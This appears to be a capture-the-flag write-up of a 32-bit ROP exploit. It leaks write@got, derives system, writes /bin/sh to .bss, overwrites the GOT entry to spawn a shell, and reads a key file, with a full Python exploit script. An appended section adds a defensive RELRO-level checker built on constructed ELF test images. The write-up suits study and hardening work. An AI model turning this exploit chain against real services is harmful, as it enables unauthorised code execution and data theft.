Attack scenario
1. Leak the write@got address using the write function
2. Derive the system address from the distance between write and system
3. Write /bin/sh into the .bss section using read@plt
4. Overwrite write@got with the system address using read@plt
5. Call system through the overwritten write@got
6. Execute the command
[exploit code]
from socket import *
from struct import *
p = lambda x:pack("<L", x)
up = lambda x:unpack("<L", x)[0]
bss = p(0x08049628)
pppr = p(0x080484b6)
write_plt = p(0x0804830c)
write_got = p(0x08049614)
read_plt = p(0x0804832c)
offset = 0x9b3e0
cmd = "/bin/sh"
s = socket(AF_INET, SOCK_STREAM)
s.connect(("localhost", 9999))
#write@got leak
payload = ""
payload += "a" * 140
payload += write_plt
payload += pppr
payload += p(1)
payload += write_got
payload += p(4)
# /bin/sh -> bss section
payload += read_plt
payload += pppr
payload += p(0)
payload += bss
payload += p(len(cmd))
#write@got overwriting
payload += read_plt
payload += pppr
payload += p(0)
payload += write_got
payload += p(4)
#call write(system)
payload += write_plt
payload += "aaaa"
payload += bss
s.send(payload + "\n")
write = up(s.recv(4))
system = write - offset
print "write = "+hex(write)
print "system = "+hex(system)
s.send(cmd)
s.send(p(system))
s.send("cat /home/hide/rop/key\n")
print s.recv(1024)
s.close()
Server environment: Ubuntu 14
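Step 4 of the scenario only works because write@got is still writable when the chain runs; with Full RELRO (a PT_GNU_RELRO segment plus BIND_NOW) the loader resolves every import up front and remaps the GOT read-only, so the overwrite faults instead of redirecting write to system. The added example below, which is not part of the original writeup, reads a 32-bit little-endian ELF's program headers and dynamic section and reports the RELRO level; relro_level and build_sample are names chosen here, and the ELF images are constructed inline for testing rather than taken from the challenge binary.

```python
import struct

PT_LOAD, PT_DYNAMIC, PT_GNU_RELRO = 1, 2, 0x6474E552
DT_NULL, DT_BIND_NOW, DT_FLAGS = 0, 24, 30
DF_BIND_NOW = 0x8

def relro_level(elf):
    """Return 'none', 'partial' or 'full' for a 32-bit little-endian ELF image.
    'partial' means the GOT stays writable, which is what a write@got overwrite needs."""
    if elf[:4] != b"\x7fELF" or elf[4] != 1 or elf[5] != 1:
        raise ValueError("expected a 32-bit little-endian ELF")
    e_phoff, = struct.unpack_from("<I", elf, 28)          # Elf32_Ehdr.e_phoff
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 42)
    has_relro, bind_now = False, False
    for i in range(e_phnum):
        p_type, p_offset, _, _, p_filesz = struct.unpack_from(
            "<IIIII", elf, e_phoff + i * e_phentsize)      # Elf32_Phdr prefix
        if p_type == PT_GNU_RELRO:
            has_relro = True
        elif p_type == PT_DYNAMIC:
            # Walk Elf32_Dyn entries (d_tag, d_val) until DT_NULL.
            for off in range(p_offset, p_offset + p_filesz, 8):
                d_tag, d_val = struct.unpack_from("<iI", elf, off)
                if d_tag == DT_NULL:
                    break
                if d_tag == DT_BIND_NOW or (d_tag == DT_FLAGS and d_val & DF_BIND_NOW):
                    bind_now = True
    if has_relro and bind_now:
        return "full"
    return "partial" if has_relro else "none"

def build_sample(relro, bind_now):
    """Construct a minimal, non-loadable ELF32 image (constructed test data, not a real binary):
    header, a PT_DYNAMIC phdr, a second phdr that is PT_GNU_RELRO or plain PT_LOAD."""
    dyn = struct.pack("<iI", DT_FLAGS, DF_BIND_NOW) if bind_now else b""
    dyn += struct.pack("<iI", DT_NULL, 0)
    dyn_off = 52 + 32 * 2                                   # ehdr + two phdrs
    phdrs = struct.pack("<IIIIIIII", PT_DYNAMIC, dyn_off, 0, 0, len(dyn), len(dyn), 6, 4)
    phdrs += struct.pack("<IIIIIIII", PT_GNU_RELRO if relro else PT_LOAD, 0, 0, 0, 0, 0, 4, 1)
    ehdr = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8   # ELFCLASS32, ELFDATA2LSB
    ehdr += struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0, 52, 0, 0, 52, 32, 2, 40, 0, 0)
    return ehdr + phdrs + dyn

if __name__ == "__main__":
    for relro, bind_now in ((False, False), (True, False), (True, True)):
        print(relro, bind_now, "->", relro_level(build_sample(relro, bind_now)))
```

On a real target the same function can be fed the bytes of the challenge binary; a result of "none" or "partial" is the condition under which the chain above can redirect write@got.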